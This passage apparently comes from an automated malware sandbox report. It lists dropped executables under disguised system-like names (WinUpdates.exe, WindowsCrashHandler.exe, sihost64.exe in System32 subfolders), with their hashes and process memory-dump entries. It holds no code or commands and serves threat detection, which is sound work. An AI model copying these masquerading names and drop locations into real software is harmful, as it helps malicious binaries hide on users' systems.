                e3fd5c1710b4cbfe3954a2e6b68b3060ebcdb38eca23dfaec2d183b917336445

                SHA512

                b3bcfada74ef97def3b6298d5ba85505bd01792d6a3f277a59883aa23fcafd13f286f5919616ab0da43bbc8cbe88916fe5425b00bd0c4c349ad422a8b38be4be

              • C:\Users\Admin\AppData\Roaming\Win10.exe

                Filesize

                37KB

                MD5

                929bf03d3683885aa9563f1409c1a952

                SHA1

                38a241f8146a00bf9643599689cff8d4d1500c0b

                SHA256

                5750d2673d5761d8a9682c326520ef2d4a5a18099dfd28a66b3a0ee5c0103a39

                SHA512

                9f0afc7fbda30fd82cd45aefdfbb3174c68047b2814c94c4191f2a12944e164dbd4d6b6f293cb2e94933df152ece30ee24a31cd67c90a781e8a7d248e3757023

              • C:\Users\Admin\AppData\Roaming\WinUpdates.exe

                Filesize

                43KB

                MD5

                92028f98bfbb9b4db77a212f74ba6d54

                SHA1

                a282dbcf99a67e11d83a215f8d36793fc9bca979

                SHA256

                f55537eae7103d810796940652bc773cde36f28de6430fc9e3913404bfc319d2

                SHA512

                e37efd800e7fc6b3fbad1b604c177bcc69925d294ad79eda3951a0e5a3c819609a8e268a09db613cde3b2f9d59d0845ba9a8829298a776737b35ffb96f120d42

              • C:\Users\Admin\AppData\Roaming\WindowsCrashHandler.exe

                Filesize

                32KB

                MD5

                c4a9e3f79e55227fa8544d08e502f1a8

                SHA1

                fb8090265164991e1e3a98e09a4d4f8795516dae

                SHA256

                c7421524f43f2c3292f68ffde94e3b78284493a3e43d66a5062f2c0826eff120

                SHA512

                057abcbc6f84bba7d3425866dd8606387322f7351b396dd0dc48c513dab77d7662681aed8ab7bfe65074771507c72cc9b78f5b00a875dd7880495826f3264a5b

              • C:\Users\Admin\AppData\Roaming\WindowsHost.exe

                Filesize

                168KB

                MD5

                58cd65979ea6a99f2e0ea173c8337731

                SHA1

                5b4a2d5a36697aa214717786eb04b3cd494d5c54

                SHA256

                7e92ea343aaecf6a5e62dee72ec3dc93c48158781e55538d2e346ae5f30489d4

                SHA512

                d63982207cdd9d094c66db9ff9a1d08285f9f04e7053cb2f33675b12ab2bc97f1291564e84852aed1067a097322213323a601497addb3fd0d7602f57d3916e84

              • C:\Windows\System32\Microsoft\Libs\sihost64.exe

                Filesize

                7KB

                MD5

                4d4f293bfa7b5943bb487ce57875c67d

                SHA1

                52a0cf3d23291d4bc7a9ff13ff59333b024d7ea7

                SHA256

                a27ff2a2e0ecf8cbb77a3fedf293ee7b552696dba33fba01402758dec3a544c1

                SHA512

                c3f7360e97bd060b713fdede7977ad60f0dd32e4180a954b0a576223719ee24bb2896429949990263cade7f1d47ab6434668cff816b46fad0a13db34d74037e2

              • C:\Windows\System32\Microsoft\Telemetry\sihost32.exe

                Filesize

                8KB

                MD5

                1cd58eb4ab60df57796ca644b7a7236b

                SHA1

                e1cac63b2ef39bee0a24b73c16d723897a1c4355

                SHA256

                224c48cf2b88a912a4166c340508acf2f7a59066bf0ec80b5ccc0ca720ba0885

                SHA512

                17f0c49768f5cae80f4f08f9f57e922026c0b64c7bf2568574dc0e35e7ca9db9f8cbd0da4537dbc313f80d006733333a7b1caaf7c938fbc1acaf2018068bbbc9

              • memory/1308-246-0x0000000000B40000-0x0000000000B46000-memory.dmp

                Filesize

                24KB

              • memory/1512-84-0x000001B69E240000-0x000001B69E262000-memory.dmp

                Filesize

                136KB

              • memory/1816-268-0x0000000140000000-0x0000000140786000-memory.dmp

                Filesize

                7.5MB

              • memory/1816-271-0x0000021CF4EB0000-0x0000021CF4ED0000-memory.dmp

                Filesize

                128KB

              • memory/1816-273-0x0000000140000000-0x0000000140786000-memory.dmp

                Filesize

                7.5MB

              • memory/1816-274-0x0000000140000000-0x0000000140786000-memory.dmp

                Filesize

                7.5MB

              • memory/1816-275-0x0000000140000000-0x0000000140786000-memory.dmp

                Filesize

                7.5MB

              • memory/1816-276-0x0000000140000000-0x0000000140786000-memory.dmp

                Filesize

                7.5MB

              • memory/1816-272-0x0000000140000000-0x0000000140786000-memory.dmp

                Filesize

                7.5MB

              • memory/1816-280-0x0000000140000000-0x0000000140786000-memory.dmp

                Filesize

                7.5MB

              • memory/1816-270-0x0000000140000000-0x0000000140786000-memory.dmp

                Filesize

                7.5MB

              • memory/1816-278-0x0000000140000000-0x0000000140786000-memory.dmp

                Filesize

                7.5MB

              • memory/1816-285-0x0000000140000000-0x0000000140786000-memory.dmp

                Filesize

                7.5MB

              • memory/1816-281-0x0000000140000000-0x0000000140786000-memory.dmp

                Filesize

                7.5MB

              • memory/2028-1-0x0000000074E80000-0x0000000075431000-memory.dmp

                Filesize

                5.7MB

              • memory/2028-0-0x0000000074E82000-0x0000000074E83000-memory.dmp

                Filesize

                4KB

              • memory/2028-2-0x0000000074E80000-0x0000000075431000-memory.dmp

                Filesize

                5.7MB

              • memory/2028-27-0x0000000074E80000-0x0000000075431000-memory.dmp

                Filesize

                5.7MB

              • memory/2348-266-0x00000000002B0000-0x00000000002B6000-memory.dmp

                Filesize

                24KB

              • memory/2544-28-0x0000000074E80000-0x0000000075431000-memory.dmp

                Filesize

                5.7MB

              • memory/2544-56-0x0000000074E80000-0x0000000075431000-memory.dmp

                Filesize

                5.7MB

              • memory/2544-29-0x0000000074E80000-0x0000000075431000-memory.dmp

                Filesize

                5.7MB

              • memory/2544-26-0x0000000074E80000-0x0000000075431000-memory.dmp

                Filesize

                5.7MB

              • memory/2772-104-0x00000000052F0000-0x0000000005894000-memory.dmp

                Filesize

                5.6MB

              • memory/2772-107-0x0000000005990000-0x00000000059A2000-memory.dmp

                Filesize

                72KB

              • memory/2772-289-0x0000000000400000-0x0000000000B07000-memory.dmp

                Filesize

                7.0MB

              • memory/2772-143-0x0000000000400000-0x0000000000B07000-memory.dmp

                Filesize

                7.0MB

              • memory/2772-22-0x0000000000400000-0x0000000000B07000-memory.dmp

                Filesize

                7.0MB

              • memory/2772-121-0x0000000005BA0000-0x0000000005CAA000-memory.dmp

                Filesize

                1.0MB

              • memory/2772-87-0x0000000000400000-0x0000000000B07000-memory.dmp

                Filesize

                7.0MB

              • memory/2772-110-0x0000000005A10000-0x0000000005A5C000-memory.dmp

                Filesize

                304KB

              • memory/2772-108-0x00000000059B0000-0x00000000059EC000-memory.dmp

                Filesize

                240KB

              • memory/2772-230-0x0000000000400000-0x0000000000B07000-memory.dmp

                Filesize

                7.0MB

              • memory/2772-106-0x0000000005F10000-0x0000000006528000-memory.dmp

                Filesize

                6.1MB

              • memory/2772-105-0x00000000058A0000-0x00000000058F0000-memory.dmp

                Filesize

                320KB

              • memory/2772-88-0x0000000000400000-0x0000000000B07000-memory.dmp

                Filesize

                7.0MB

              • memory/2772-103-0x0000000005250000-0x00000000052A2000-memory.dmp

                Filesize

                328KB

              • memory/2772-89-0x0000000000400000-0x0000000000B07000-memory.dmp

                Filesize

                7.0MB

              • memory/4140-50-0x0000000000010000-0x0000000000020000-memory.dmp

                Filesize

                64KB

              • memory/4140-155-0x0000000002630000-0x0000000002642000-memory.dmp

                Filesize

                72KB

              • memory/4140-154-0x0000000002600000-0x000000000260E000-memory.dmp

                Filesize

                56KB

              • memory/4296-162-0x0000000000CF0000-0x0000000000CFA000-memory.dmp

                Filesize

                40KB

              • memory/4416-72-0x00000000008D0000-0x00000000008DC000-memory.dmp

                Filesize

                48KB